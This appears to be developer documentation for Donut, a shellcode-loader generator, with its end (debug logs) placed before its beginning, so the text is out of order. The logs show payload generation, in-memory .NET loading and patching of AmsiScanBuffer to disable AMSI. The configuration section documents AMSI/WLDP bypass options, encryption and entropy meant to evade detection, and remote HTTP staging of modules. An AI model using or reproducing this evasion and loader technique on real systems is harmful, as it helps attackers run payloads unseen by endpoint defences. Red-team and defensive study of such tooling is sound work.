308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
0
1 <html>
2 <head>
3 <meta charset="utf-8">
4 </head>
5 <body>
6
7 <h2>Table of contents</h2>
8
9 <ol>
10 <li><a href="#intro">Introduction</a></li>
11 <li><a href="#api">Donut API</a></li>
12 <li><a href="#config">Donut Configuration</a></li>
13 <li><a href="#static">Static Example</a></li>
14 <li><a href="#dynamic">Dynamic Example</a></li>
15 <li><a href="#com">Donut Components</a></li>
16 <li><a href="#instance">Donut Instance</a></li>
17 <li><a href="#module">Donut Module</a></li>
18 <li><a href="#hashing">Win32 API Hashing</a></li>
19 <li><a href="#encryption">Symmetric Encryption</a></li>
20 <li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
21 <li><a href="#debug">Debugging The Generator and Loader</a></li>
22 <li><a href="#loader">Extending The Loader</a></li>
23 </ol>
24
25 <h2 id="intro">1. Introduction</h2>
26
27 <p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
28
29 <h2 id="api">2. Donut API</h2>
30
31 <p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
32
33 <ol>
34
35 <li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
36 <p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
37
38 <li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
39 <p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
40
41 <li><code>const char* DonutError(int error)</code></li>
42 <p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
43
44 </ol>
45
46 <p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
47
48 <h2 id="config">3. Donut Configuration</h2>
49
50 <p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
51
52 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
53 uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
54 <span style='color:#696969; '>// general / misc options for loader</span>
55 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
56 <span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
57 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
58 <span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
59 <span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
60 <span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
61 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
62 uint64_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
63
64 <span style='color:#696969; '>// files in/out</span>
65 <span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
66 <span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
67
68 <span style='color:#696969; '>// .NET stuff</span>
69 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
70 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
71 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
72 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
73
74 <span style='color:#696969; '>// command line for DLL/EXE</span>
75 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
76 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
77
78 <span style='color:#696969; '>// HTTP/DNS staging information</span>
79 <span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
80 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
81
82 <span style='color:#696969; '>// DONUT_MODULE</span>
83 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
84 <span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
85 DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
86
87 <span style='color:#696969; '>// DONUT_INSTANCE</span>
88 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
89 <span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
90 DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
91
92 <span style='color:#696969; '>// shellcode generated from configuration</span>
93 <span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
94 <span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
95 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
96 </pre>
97
98 <p>The following table provides a description of each member.</p>
99
100 <table border="1">
101 <tr>
102 <th>Member</th>
103 <th>Description</th>
104 </tr>
105 <tr>
106 <td><code>len, zlen</code></td>
107 <td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
108 </tr>
109 <tr>
110 <td><code>arch</code></td>
111 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
112 </tr>
113 <tr>
114 <td><code>bypass</code></td>
115 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
116 </tr>
117 <tr>
118 <td><code>compress</code></td>
119 <td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
120 </tr>
121 <tr>
122 <td><code>entropy</code></td>
123 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
124 </tr>
125 <tr>
126 <td><code>format</code></td>
127 <td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
128 </tr>
129 <tr>
130 <td><code>exit_opt</code></td>
131 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
132 </tr>
133 <tr>
134 <td><code>thread</code></td>
135 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
136 </tr>
137 <tr>
138 <td><code>oep</code></td>
139 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
140 </tr>
141
142 <tr>
143 <td><code>input</code></td>
144 <td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
145 </tr>
146 <tr>
147 <td><code>output</code></td>
148 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
149 </tr>
150
151 <tr>
152 <td><code>runtime</code></td>
153 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
154 </tr>
155 <tr>
156 <td><code>domain</code></td>
157 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
158 </tr>
159 <tr>
160 <td><code>cls</code></td>
161 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
162 </tr>
163 <tr>
164 <td><code>method</code></td>
165 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
166 </tr>
167
168 <tr>
169 <td><code>param</code></td>
170 <td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
171 </tr>
172 <tr>
173 <td><code>unicode</code></td>
174 <td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
175 </tr>
176
177 <tr>
178 <td><code>server</code></td>
179 <td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
180 </tr>
181
182 <tr>
183 <td><code>modname</code></td>
184 <td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
185 </tr>
186 <tr>
187 <td><code>mod_type</code></td>
188 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
189 </tr>
190 <tr>
191 <td><code>mod_len</code></td>
192 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
193 </tr>
194 <tr>
195 <td><code>mod</code></td>
196 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
197 </tr>
198
199 <tr>
200 <td><code>inst_type</code></td>
